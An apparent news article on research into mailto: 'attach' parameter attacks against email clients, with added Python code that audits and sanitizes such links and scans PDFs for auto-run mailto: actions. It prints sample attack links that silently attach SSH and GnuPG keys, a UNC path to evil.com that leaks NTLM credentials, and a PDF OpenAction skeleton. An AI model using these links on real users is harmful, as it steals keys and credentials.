Attack on mail client users using "mailto:" links

Researchers from Ruhr University Bochum (Germany) analyzed (PDF) how mail clients handle "mailto:" links that carry additional parameters. Five of the twenty email clients examined were vulnerable to an attack that silently plants files into an outgoing message via the "attach" parameter. Another six clients were affected by a PGP and S/MIME key-swap attack, and three clients were vulnerable to an attack that extracts the plaintext of encrypted messages.

"mailto:" links are used to open the mail client automatically with a new message addressed to the recipient named in the link. Besides the address, the link can carry additional parameters such as the subject and a template for the message body. The proposed attack abuses the "attach" parameter, which adds an attachment to the message being composed.

Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) and Pegasus Mail were vulnerable to a trivial attack that attaches any local file named in a link of the form "mailto:?attach=path_to_file". The file is attached without any warning, so unless the user looks closely they may not notice that the email will go out with an attachment.

For example, a link like "mailto:[email protected]?subject=Title&body=Text&attach=~/.gnupg/secring.gpg" slips the user's GnuPG private keyring into the email. In the same way one can exfiltrate crypto wallets (~/.bitcoin/wallet.dat), SSH keys (~/.ssh/id_rsa) and any other file readable by the user. Moreover, Thunderbird accepts wildcards, so a construction like "attach=/tmp/*.txt" attaches a whole group of files at once.

In addition to local files, some mail clients accept paths to network shares and to folders on the IMAP server. In particular, IBM Notes fetches a file from a network share when processing a link like "attach=\\evil.com\dummyfile"; pointing the link at an SMB server controlled by the attacker therefore also leaks NTLM authentication data, because the request is sent with the current user's credentials.

Thunderbird honours requests like "attach=imap:///fetch>UID>/INBOX>1/" and attaches messages pulled from folders on the IMAP server. Messages retrieved from IMAP that are encrypted with OpenPGP or S/MIME are decrypted by the mail client before they are sent. Thunderbird developers were notified in February, and the problem is fixed in Thunderbird 78 (the 52, 60 and 68 branches remain vulnerable).
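The following Python script is an added example, not code from the article or from the researchers, that parses a "mailto:" link the way a client would and classifies every "attach" value by what a vulnerable client would pull in: a home-relative file, a wildcard, a UNC share path (NTLM leak) or a remote scheme such as imap://. It also shows the defensive counterpart, rebuilding the link with only the header fields RFC 6068 treats as safe (to, cc, bcc, subject, body). Treating "attachment" as an alias of "attach" is an assumption made here, not something the article states; the sample links are constructed.

```python
"""Audit mailto: links for abuse of the "attach" parameter.

parse_mailto() splits a link into recipients and header fields, classify_attach()
says what a vulnerable client would pull in for a given "attach" value, and
sanitize_mailto() rebuilds the link with only the header fields RFC 6068 treats
as safe (to, cc, bcc, subject, body).
"""
import re
from urllib.parse import parse_qsl, quote, unquote, urlencode

# Header fields RFC 6068 says a mail client may honour; everything else is dropped.
SAFE_HEADERS = {"to", "cc", "bcc", "subject", "body"}
# "attach" is the parameter from the article; "attachment" as an alias is an
# assumption made in this example, not something the article states.
ATTACH_KEYS = {"attach", "attachment"}


def parse_mailto(link):
    """Return (recipients, [(field, value), ...]) for a mailto: URL."""
    if link[:7].lower() != "mailto:":
        raise ValueError("not a mailto: link")
    to_part, _, query = link[7:].partition("?")
    recipients = [unquote(a) for a in to_part.split(",") if a]
    # parse_qsl percent-decodes each field, exactly as a mail client would.
    headers = [(k.lower(), v) for k, v in parse_qsl(query, keep_blank_values=True)]
    return recipients, headers


def classify_attach(value):
    """Classify what an "attach" value points at."""
    if value.startswith(("\\\\", "//")):
        return "unc"            # \\host\share: SMB fetch, NTLM credentials may leak
    m = re.match(r"^([A-Za-z][A-Za-z0-9+.\-]+):", value)  # 2+ chars, so C:\ is not a scheme
    if m:
        scheme = m.group(1).lower()
        return "local" if scheme == "file" else "remote:" + scheme  # e.g. remote:imap
    if re.search(r"[*?\[]", value):
        return "glob"           # wildcard: a whole set of files at once
    if value.startswith("~"):
        return "home"           # relative to the user's home directory
    return "local"


def audit_mailto(link):
    """List (field, value, classification) for every attach-like field in the link."""
    _, headers = parse_mailto(link)
    return [(k, v, classify_attach(v)) for k, v in headers if k in ATTACH_KEYS]


def sanitize_mailto(link):
    """Rebuild the link keeping only RFC 6068 safe header fields."""
    recipients, headers = parse_mailto(link)
    kept = [(k, v) for k, v in headers if k in SAFE_HEADERS]
    query = urlencode(kept, quote_via=quote)   # quote, not quote_plus: spaces become %20
    result = "mailto:" + ",".join(quote(r, safe="@") for r in recipients)
    return result + ("?" + query if query else "")


# Constructed sample links mirroring the cases in the article (not real targets).
SAMPLES = [
    "mailto:?subject=Title&body=Text&attach=~/.gnupg/secring.gpg",
    "mailto:?attach=/tmp/*.txt",
    r"mailto:?attach=\\evil.com\dummyfile",
    "mailto:?attach=imap:///fetch>UID>/INBOX>1/",
    "mailto:alice@example.com?subject=Hi&body=Hello%20there",
]

if __name__ == "__main__":
    for link in SAMPLES:
        print(link)
        for field, value, kind in audit_mailto(link):
            print(f"  {field}={value!r} -> {kind}")
        print("  sanitized:", sanitize_mailto(link))
```

The classifier deliberately checks the UNC prefix before the scheme regex, because "\\evil.com\..." has no scheme but is the case that leaks NTLM credentials; a client that wants to be safe does not need the classifier at all and should simply drop every field outside SAFE_HEADERS, which is what sanitize_mailto() does.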

Older versions of Thunderbird were also vulnerable to two further attacks on PGP and S/MIME proposed by the researchers. First, Thunderbird, together with Outlook, PostBox, eM Client, MailMate and R2Mail2, was subject to a key-swap attack: the client automatically imports and installs new certificates carried in S/MIME messages, which lets an attacker replace public keys the user has already stored.

The second attack, which affects Thunderbird, PostBox and MailMate, abuses the mechanism that autosaves draft messages: mailto parameters are used to trigger decryption of an encrypted message, or the signing of an arbitrary message, after which the result is transferred to an IMAP server controlled by the attacker. The ciphertext is passed in the "body" parameter, and a "meta refresh" tag initiates the connection to the attacker's IMAP server.

Specially crafted PDF documents can trigger "mailto:" links without any user interaction: the OpenAction entry in a PDF runs the mailto handler as soon as the document is opened:

%PDF-1.5
% Catalog: /OpenAction runs the referenced action as soon as the document is opened
1 0 obj
<< /Type /Catalog /OpenAction 2 0 R >>
endobj

% URI action: the viewer hands the mailto: link to the system's mail client
2 0 obj
<< /Type /Action /S /URI /URI (mailto:?body=-----BEGIN PGP MESSAGE-----[…]) >>
endobj

trailer
<< /Root 1 0 R >>
%%EOF
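As an added example that is not part of the article or the researchers' work, the following Python triage scanner looks for exactly this construction: a "/OpenAction" in the catalog that leads to a "/S /URI" action whose URI is a "mailto:" link, and flags it when the link carries an "attach" or "body" parameter. It is a regex heuristic over the raw file, not a PDF parser: objects hidden in compressed object streams (/ObjStm) or URIs written as hex strings will slip past it, so use it for first-pass triage only. The embedded PDF sample is constructed here to match the document shown above.

```python
"""Triage scanner: does a PDF launch a mailto: link automatically on open?

Regex-based heuristic over the raw bytes. It only sees uncompressed objects, so
a PDF that hides the catalog or the action in an object stream (/ObjStm) or
writes the URI as a hex string <...> will slip past it; use a real PDF parser
for anything beyond first-pass triage.
"""
import re

# Constructed sample in the shape of the document shown above (not a real file).
PDF_SAMPLE = b"""%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction 2 0 R >>
endobj
2 0 obj
<< /Type /Action /S /URI /URI (mailto:?body=-----BEGIN PGP MESSAGE-----[...]) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
# /OpenAction either references an object (optionally wrapped in [...]) or holds
# the action dictionary inline.
OPENACTION_RE = re.compile(rb"/OpenAction\s*(?:\[?\s*(\d+)\s+(\d+)\s+R|(<<.*?>>))", re.S)
URI_ACTION_RE = re.compile(rb"/S\s*/URI\b")
URI_STRING_RE = re.compile(rb"/URI\s*\((.*?)(?<!\\)\)", re.S)


def pdf_string(raw):
    """Undo the common PDF literal-string escapes \\( \\) \\\\ and decode as Latin-1."""
    return re.sub(rb"\\([()\\])", rb"\1", raw).decode("latin-1")


def load_objects(pdf):
    """Map object number -> body for every uncompressed 'N G obj ... endobj'."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}


def open_actions(pdf):
    """Yield the body of every action reachable from an /OpenAction entry."""
    objs = load_objects(pdf)
    for m in OPENACTION_RE.finditer(pdf):
        if m.group(1):                      # indirect reference: N G R
            body = objs.get(int(m.group(1)))
            if body is not None:
                yield body
        else:                               # inline dictionary
            yield m.group(3)


def mailto_on_open(pdf):
    """Return the mailto: URIs a viewer would hand to the mail client on open."""
    found = []
    for body in open_actions(pdf):
        if not URI_ACTION_RE.search(body):
            continue
        for s in URI_STRING_RE.finditer(body):
            uri = pdf_string(s.group(1))
            if uri.lower().startswith("mailto:"):
                found.append(uri)
    return found


def is_suspicious(pdf):
    """True if an auto-run mailto: link carries an attachment or a message body."""
    return any(re.search(r"[?&](attach|attachment|body)=", u, re.I)
               for u in mailto_on_open(pdf))


if __name__ == "__main__":
    for uri in mailto_on_open(PDF_SAMPLE):
        print("auto-run on open:", uri)
    print("suspicious:", is_suspicious(PDF_SAMPLE))
```

A "/OpenAction" that merely jumps to a page is harmless; the scanner only reports URI actions, and only those whose target is a mailto: link, so that ordinary documents with page-level open actions do not raise alerts.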


Source: opennet.ru
